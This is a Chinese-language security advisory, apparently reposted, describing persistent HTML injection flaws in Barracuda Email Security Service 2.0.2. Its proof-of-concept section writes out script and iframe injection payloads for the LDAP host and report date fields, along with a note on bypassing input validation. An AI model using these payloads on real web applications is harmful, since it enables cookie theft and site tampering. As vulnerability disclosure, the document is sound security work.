Barracuda Email Security Service多个HTML注入漏洞

发布日期：2012-08-02
更新日期：2012-08-08

受影响系统：
Barracuda Networks Email Security Service 2.0.2
Barracuda Networks Email Security Service
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54773

Barracuda Email Security Service 是基于云的电子邮件安全服务。

Barracuda Email Security Service 2.0.2及其他版本在实现上存在多个HTML注入漏洞，攻击者可利用这些漏洞注入恶意HTML和脚本代码，从而窃取Cookie身份验证凭证或控制站点外观。

<*来源：Benjamin Kunz Mejri
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Benjamin Kunz Mejri （）提供了如下测试方法：

Proof of Concept:
=================
1.1
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...

Review:  Domain Settings > Directory Services > LDAP Host

<div>
        <h4>Directory Services</h4>
        <div>
          <div><img src="https://www.linuxidc.com/images/spinner1.gif"
alt="loading..."> Connecting to >"<iframe src="https://www.example1.com">@gmail.com >"<script>alert(document.cookie)</script><divfloat: right;">
            <a href="https://www.example2.com/domains/sync_ldap/4"><span><span>Synchronize Now</span></span></a>
            <a href="#"><span><span>Test Settings</span></span></a>
          </div>
          <p>
            <label for="ldap_host">LDAP Host:</label>
            <input size="30" value=">
"<iframe src=https://www.example1.com>@gmail.com >"<script>alert(document.cookie)</script><
div type="text">

URL:   https://www.example.com/domains/info/4

PoC: >">"<iframe src=https://www.example1.com>VL >"<div>"

Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (>") will be bypassed and the string will be executed out of the secure exception handling message.

1.2
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...

Vulnerable Module: Reports > Date Start > Date End

PoC: >"<iframe src=https://www.example1.com>

URL: https://www.example.com/reports

Note:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.

建议：
--------------------------------------------------------------------------------
厂商补丁：

Barracuda Networks
------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：